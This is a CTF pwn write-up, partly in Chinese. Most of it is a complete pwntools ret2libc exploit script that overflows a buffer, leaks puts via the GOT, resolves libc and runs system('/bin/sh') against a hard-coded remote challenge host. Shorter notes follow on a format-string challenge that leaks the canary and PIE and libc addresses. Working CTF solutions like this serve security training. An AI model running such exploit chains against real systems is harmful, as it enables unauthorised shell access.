ret2libc
看保护:

no PIE, no canary



进入revenge函数后:

| from pwn import * import os from LibcSearcher import * context(arch='amd64', os='linux', log_level='debug')
# Only when running inside a Zellij session (env var set to "0") route
# pwntools' terminal spawns (e.g. the debugger pane) into a new right-hand pane.
if os.environ.get("ZELLIJ") == "0":
    context.terminal = [
        "zellij",
        "action",
        "new-pane",
        "-d",
        "right",
        "-c",
        "--",
        "bash",
        "-c",
    ]

# Target binary; the write-up above states it has neither PIE nor a canary,
# which is why the script below relies on fixed addresses from it.
exe = ELF('./pwn')
def conn():
    """Open the I/O channel to the challenge, chosen by pwntools `args`.

    Returns:
        A pwntools tube: a local process (optionally with gdb attached),
        a process started under gdb with a breakpoint on main, or a remote
        connection to the host/port hard-coded below.
    """
    if args.LOCAL:
        io = process([exe.path])
        # attach the debugger to the already-running local process
        if args.GDB:
            gdb.attach(io)
    elif args.GDB:
        # no LOCAL flag: launch directly under gdb with a breakpoint on main
        io = gdb.debug([exe.path], "b *main")
    else:
        io = remote('47.94.103.208', 24586)
    return io
def main():
    """Drive the ret2libc solution described in the write-up.

    Flow (as far as the visible code shows): overflow the buffer in `revenge`,
    leak the address of puts via the GOT, resolve the libc build with
    LibcSearcher, then send a second chain calling system. Gadget addresses
    are hard-coded, which is only valid because the binary is not PIE.

    NOTE(review): the listing this was restored from had no line structure;
    the extent of the `for` loop below (whether recvuntil is inside it) was
    reconstructed — confirm against the original file.
    """
    global io
    io = conn()
    # distance from the buffer to the saved data that the chain overwrites
    offset = 0x218 + 4
    puts_got = exe.got['puts']
    puts_plt = exe.plt['puts']
    # fixed gadget addresses in the non-PIE binary (names describe their effect)
    add_rsi = 0x04010EB
    reset_rsi = 0x04010E4
    mov_rdi_rsi = 0x0401180
    # NOTE: this shadows the enclosing function name `main` with a local int;
    # harmless here, but a clearer name (e.g. main_addr) would avoid confusion.
    main = exe.symbols['main']
    # unused in the code shown below
    _rbp_ = puts_got - 0x20
    # unused in the code shown below
    revenge = exe.symbols['revenge']
    # immediately overwritten by the next assignment (dead store)
    payload = b'A' * offset + b'\x28' + p64(main)
    # First chain: the single b'\x28' byte sits between the padding and the
    # return chain (presumably a low-byte overwrite of a saved value — verify
    # in the debugger); the chain itself prints puts@got via puts@plt and
    # returns to main.
    payload = b'A' * offset + b'\x28' + p64(reset_rsi) + p64(add_rsi) + p64(mov_rdi_rsi) + p64(puts_plt) + p64(main) + p64(puts_got)
    io.sendline(payload)
    # Re-enter main repeatedly; the write-up does not say why 228 rounds are
    # needed, so treat the count as empirically tuned.
    payload = b'A' * offset + b'\x28' + p64(main)
    for _ in range(228):
        io.sendline(payload)
    # take the 6 address bytes ending in 0x7f and zero-extend to 8 bytes
    recv_bytes = io.recvuntil(b'\x7f')[-6:]
    puts_addr = u64(recv_bytes.ljust(8, b'\x00'))
    log.success('puts_addr: ' + hex(puts_addr))
    # Candidate libc chosen by index 9 from LibcSearcher's list; this index is
    # specific to the search result at the time of writing.
    libc = LibcSearcher('puts', puts_addr)
    libc.select_libc(9)
    libc_base = puts_addr - libc.dump('puts')
    # a lone `ret` gadget, used for stack alignment before the call
    ret = 0x040101a
    system_addr = libc_base + libc.dump('system')
    binsh_addr = libc_base + libc.dump('str_bin_sh')
    # Second chain: same gadget prefix, then ret -> system(binsh_addr).
    payload = b'A' * offset + b'\x28' + p64(reset_rsi) + p64(add_rsi) + p64(mov_rdi_rsi) + p64(ret) + p64(system_addr) + p64(binsh_addr)
    io.sendline(payload)
    io.interactive()
# Script entry point; keeps the module importable without side effects.
if __name__ == "__main__":
    main()
web苦手
逆向巨恶心, 不如叫逆向苦手
girlfriend
非常有用的格式化字符串漏洞
在replay()函数中:

可以泄露出pie基址、__libc_start_call_main地址、rbp中的值(main函数的rbp)、canary
第一次实验


第二次实验


第一次调试


布置栈布置了半天也没成功，我的思路是在栈上布置 ROP 链，总是差一点，应该不是正确解法